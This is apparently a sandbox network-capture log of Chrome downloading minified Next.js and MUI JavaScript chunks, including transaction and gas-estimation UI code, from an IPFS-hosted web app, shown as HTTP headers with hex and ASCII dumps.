                                                                                                                                                                                                                                                  Data Ascii: derBottomLeftRadius:0,borderBottomRightRadius:0},[`&.${h.selected} + .${h.grouped}.${h.selected}`]:{borderTop:0,marginTop:0}})})));var v=i.forwardRef((function(e,t){const o=(0,l.Z)({props:e,name:"MuiToggleButtonGroup"}),{children:d,className:p,color:h="st


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  54192.168.2.549776209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC739OUTGET /_next/static/chunks/3645-9203dd9404a3977e.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9656
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreig6ffkgzbfciggs7am2li4b24glxalxql72uqcbc7wuwxhhidetpm"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3645-9203dd9404a3977e.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreig6ffkgzbfciggs7am2li4b24glxalxql72uqcbc7wuwxhhidetpm
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 65 66 32 31 61 32 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235ef21a2c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 34 35 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 76 61 72 20 6e 3d 6f 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 6e 28 6f 28 36 34 39 33 38 29 29 2c 69 3d 6f 28 38 35 38 39 33 29 2c 61 3d 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3645],{62753:function(e,t,o){var n=o(64836);t.Z=void 0;var r=n(o(64938)),i=o(85893),a=(0,r.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 61 72 20 5a 3d 28 30 2c 6f 28 31 35 38 38 29 2e 5a 29 28 22 4d 75 69 43 68 65 63 6b 62 6f 78 22 2c 5b 22 72 6f 6f 74 22 2c 22 63 68 65 63 6b 65 64 22 2c 22 64 69 73 61 62 6c 65 64 22 2c 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 22 2c 22 63 6f 6c 6f 72 50 72 69 6d 61 72 79 22 2c 22 63 6f 6c 6f 72 53 65 63 6f 6e 64 61 72 79 22 5d 29 3b 63 6f 6e 73 74 20 67 3d 5b 22 63 68 65 63 6b 65 64 49 63 6f 6e 22 2c 22 63 6f 6c 6f 72 22 2c 22 69 63 6f 6e 22 2c 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 22 2c 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 49 63 6f 6e 22 2c 22 69 6e 70 75 74 50 72 6f 70 73 22 2c 22 73 69 7a 65 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 5d 2c 6b 3d 28 30 2c 62 2e 5a 50 29 28 6c 2e 5a 2c 7b 73 68 6f 75 6c 64 46 6f 72 77 61 72 64 50 72 6f 70 3a 65 3d
                                                                                                                                                                                                                                                  Data Ascii: ar Z=(0,o(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const g=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProps","size","className"],k=(0,b.ZP)(l.Z,{shouldForwardProp:e=
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 24 3d 68 3f 62 3a 64 2c 6a 3d 28 30 2c 72 2e 5a 29 28 7b 7d 2c 6c 2c 7b 63 6f 6c 6f 72 3a 70 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 3a 68 2c 73 69 7a 65 3a 5a 7d 29 2c 45 3d 28 65 3d 3e 7b 63 6f 6e 73 74 7b 63 6c 61 73 73 65 73 3a 74 2c 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 3a 6f 2c 63 6f 6c 6f 72 3a 6e 7d 3d 65 2c 69 3d 7b 72 6f 6f 74 3a 5b 22 72 6f 6f 74 22 2c 6f 26 26 22 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 22 2c 60 63 6f 6c 6f 72 24 7b 28 30 2c 76 2e 5a 29 28 6e 29 7d 60 5d 7d 2c 61 3d 28 30 2c 73 2e 5a 29 28 69 2c 79 2c 74 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 5a 29 28 7b 7d 2c 74 2c 61 29 7d 29 28 6a 29 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 29 28 6b 2c 28 30 2c 72 2e 5a 29 28 7b 74 79 70 65 3a 22 63 68 65 63 6b 62 6f 78 22 2c 69 6e 70
                                                                                                                                                                                                                                                  Data Ascii: $=h?b:d,j=(0,r.Z)({},l,{color:p,indeterminate:h,size:Z}),E=(e=>{const{classes:t,indeterminate:o,color:n}=e,i={root:["root",o&&"indeterminate",`color${(0,v.Z)(n)}`]},a=(0,s.Z)(i,y,t);return(0,r.Z)({},t,a)})(j);return(0,u.jsx)(k,(0,r.Z)({type:"checkbox",inp
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 73 65 63 6f 6e 64 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 65 63 6f 6e 64 61 72 79 2e 6d 61 69 6e 2c 69 6e 66 6f 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 69 6e 66 6f 2e 6d 61 69 6e 2c 73 75 63 63 65 73 73 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 73 75 63 63 65 73 73 2e 6d 61 69 6e 2c 77 61 72 6e 69 6e 67 3a
                                                                                                                                                                                                                                                  Data Ascii: ),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.main,secondary:(e.vars||e).palette.secondary.main,info:(e.vars||e).palette.info.main,success:(e.vars||e).palette.success.main,warning:
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 63 6f 6e 73 74 20 76 3d 28 30 2c 64 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 6f 3d 28 30 2c 72 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 7d 2c 28 30 2c 61 2e 6b 39 29 28 7b 74 68 65 6d 65 3a 74 7d 2c 28 30 2c 61 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 64 69 72 65 63 74 69 6f 6e 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 74 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 76 61 6c 75 65 73 7d 29 2c 28 65
                                                                                                                                                                                                                                                  Data Ascii: const v=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let o=(0,r.Z)({display:"flex",flexDirection:"column"},(0,a.k9)({theme:t},(0,a.P$)({values:e.direction,breakpoints:t.breakpoints.values}),(e
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 32 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 72 65 66 3a 74 7d 2c 65 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 35 20 31 33 6c 34 20 34 4c 31 39 20 37 22 7d 29 29 7d 29 29 3b 74 2e 5a 3d 72 7d 2c 38 30 32 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 76 61 72 20 6e 3d 6f 28 36 37
                                                                                                                                                                                                                                                  Data Ascii: //www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),n.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M5 13l4 4L19 7"}))}));t.Z=r},80227:function(e,t,o){var n=o(67
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 6f 6e 43 6f 6e 74 65 6e 74 56 69 73 69 62 6c 65 3a 6e 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 5b 72 5d 3d 65 2c 7b 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 3a 69 7d 3d 72 3b 69 66 28 69 29 7b 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 76 69 73 69 62 6c 65 3a 21 30 7d 2c 28 28 29 3d 3e 7b 6e 26 26 6e 28 29 7d 29 29 3b 63 6f 6e 73 74 20 65 3d 6e 75 6c 6c 3d 3d 28 74 3d 74 68 69 73 2e 77 72 61 70 70 65 72 29 3f 76 6f 69 64 20 30 3a 74 2e 63 75 72 72 65 6e 74 3b 65 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 6e 75 6c 6c 3d 3d 28 6f 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76 65 72 29 7c 7c 6f 2e 75 6e 6f 62 73 65 72 76 65 28 65 29 29 7d 7d 29 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76
                                                                                                                                                                                                                                                  Data Ascii: onContentVisible:n}=this.props,[r]=e,{isIntersecting:i}=r;if(i){this.setState({visible:!0},(()=>{n&&n()}));const e=null==(t=this.wrapper)?void 0:t.current;e&&e instanceof HTMLElement&&(null==(o=this.elementObserver)||o.unobserve(e))}})),this.elementObserv
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC137INData Raw: 72 65 6e 2e 6f 6e 6c 79 28 65 29 29 7d 7d 69 28 63 2c 22 64 65 66 61 75 6c 74 50 72 6f 70 73 22 2c 7b 65 6c 65 6d 65 6e 74 54 79 70 65 3a 22 64 69 76 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 22 2c 6f 66 66 73 65 74 3a 30 2c 74 68 72 65 73 68 6f 6c 64 3a 30 2c 77 69 64 74 68 3a 6e 75 6c 6c 2c 6f 6e 43 6f 6e 74 65 6e 74 56 69 73 69 62 6c 65 3a 6e 75 6c 6c 2c 68 65 69 67 68 74 3a 6e 75 6c 6c 7d 29 7d 7d 5d 29 3b
                                                                                                                                                                                                                                                  Data Ascii: ren.only(e))}}i(c,"defaultProps",{elementType:"div",className:"",offset:0,threshold:0,width:null,onContentVisible:null,height:null})}}]);


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  55192.168.2.549770209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC504OUTGET /_next/static/chunks/4787.c9a9f6a64640a9a2.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11062
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiheb5bkcywhht2bxxreu3cmpnaqznacmsesn4behswq55vfinow6y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4787.c9a9f6a64640a9a2.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiheb5bkcywhht2bxxreu3cmpnaqznacmsesn4behswq55vfinow6y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7472210
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 62 39 61 34 32 62 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235b9a42b2-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 37 38 37 5d 2c 7b 39 39 37 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 34 39 35 30 31 29 2c 61 3d 74 28 33 30 31 32 30 29 2c 6f 3d 74 28 32 39 36 33 30 29 2c 69 3d 74 28 36 39 33 33 31 29 2c 73 3d 74 28 36 37 39 31 36 29 2c 75 3d 74 28 38 35 38 39 33 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 74 78 45 72 72 6f 72 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 63 68
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4787],{99730:function(e,r,t){t.d(r,{f:function(){return c}});var n=t(49501),a=t(30120),o=t(29630),i=t(69331),s=t(67916),u=t(85893),c=function(e){var r=e.txError;return(0,u.jsxs)(a.Z,{ch
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 67 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 68 61 6e 64 6c 65 47 65 74 54 78 6e 73 2c 74 3d 65 2e 68 61 6e 64 6c 65 47 65 74 41 70 70 72 6f 76 61 6c 54 78 6e 73 2c 61 3d 65 2e 67 61 73 4c 69 6d 69 74 52
                                                                                                                                                                                                                                                  Data Ascii: rs?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):g(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var b=function(e){var r=e.handleGetTxns,t=e.handleGetApprovalTxns,a=e.gasLimitR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 65 2e 6e 65 78 74 3d 33 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 33 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 31 33 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 35 29 2c 65 2e 70 72 65 76 3d 31 35 2c 65 2e 6e 65 78 74 3d 31 38 2c 44 28 6f 2e 68 61 73 68 29 3b 63 61 73 65 20 31 38 3a 72 65 74 75 72 6e 20 69 3d 65 2e 73 65 6e 74 2c 6f 65 2e 63 75 72 72 65 6e 74 26 26 6e 26 26 6e 28 6e 65 77 20 45 72 72 6f 72 28 69 29 2c 6f 2e 68 61 73 68 29 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 29 3b 63 61 73 65 20 32 33 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 32 33 2c 65 2e 74 31 3d 65 2e 63 61 74 63 68 28 31 35 29 2c 6f 65 2e 63 75 72 72 65 6e 74 26 26 6e 26 26 6e 28 65 2e 74 31 2c 6f 2e 68 61 73 68 29 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72
                                                                                                                                                                                                                                                  Data Ascii: e.next=30;break;case 13:return e.prev=13,e.t0=e.catch(5),e.prev=15,e.next=18,D(o.hash);case 18:return i=e.sent,oe.current&&n&&n(new Error(i),o.hash),e.abrupt("return");case 23:return e.prev=23,e.t1=e.catch(15),oe.current&&n&&n(e.t1,o.hash),e.abrupt("retur
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 29 3b 63 61 73 65 20 33 33 3a 63 3d 28 30 2c 6d 2e 57 47 29 28 65 2e 74 31 2c 6d 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 4f 28 63 29 2c 41 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 3b 63 61 73 65 20 33 36 3a 65 2e 6e 65 78 74 3d 35 36 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 38 3a 69 66 28 21 5f 29 7b 65 2e 6e 65 78 74 3d 35 36 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 33 39 2c 41 28 54 28 54 28 7b 7d 2c 4d 29 2c 7b 7d 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 29 2c 65 2e 6e 65 78 74 3d 34 33 2c 5f 2e 74 78 28 29 3b 63 61 73 65 20 34 33 3a 72 65 74 75 72 6e 20 64 65 6c 65 74 65 28 6c 3d 65 2e 73 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: urn e.abrupt("return");case 33:c=(0,m.WG)(e.t1,m.aD.GAS_ESTIMATION,!1),O(c),A({txHash:void 0,loading:!1});case 36:e.next=56;break;case 38:if(!_){e.next=56;break}return e.prev=39,A(T(T({},M),{},{loading:!0})),e.next=43,_.tx();case 43:return delete(l=e.sent
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 6f 6e 28 65 29 7b 53 28 7b 74 78 48 61 73 68 3a 65 2e 68 61 73 68 2c 6c 6f 61 64 69 6e 67 3a 21 31 2c 73 75 63 63 65 73 73 3a 21 30 7d 29 2c 4f 28 76 6f 69 64 20 30 29 7d 2c 65 72 72 6f 72 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 74 3d 28 30 2c 6d 2e 57 47 29 28 65 2c 6d 2e 61 44 2e 4d 41 49 4e 5f 41 43 54 49 4f 4e 29 3b 4f 28 74 29 2c 53 28 7b 74 78 48 61 73 68 3a 72 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 7d 2c 61 63 74 69 6f 6e 3a 6d 2e 61 44 2e 4d 41 49 4e 5f 41 43 54 49 4f 4e 7d 29 29 3b 63 61 73 65 20 31 30 3a 65 2e 70 72 65 76 3d 31 30 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 32 29 2c 61 3d 28 30 2c 6d 2e 57 47 29 28 65 2e 74 30 2c 6d 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 4f 28
                                                                                                                                                                                                                                                  Data Ascii: on(e){S({txHash:e.hash,loading:!1,success:!0}),O(void 0)},errorCallback:function(e,r){var t=(0,m.WG)(e,m.aD.MAIN_ACTION);O(t),S({txHash:r,loading:!1})},action:m.aD.MAIN_ACTION}));case 10:e.prev=10,e.t0=e.catch(2),a=(0,m.WG)(e.t0,m.aD.GAS_ESTIMATION,!1),O(
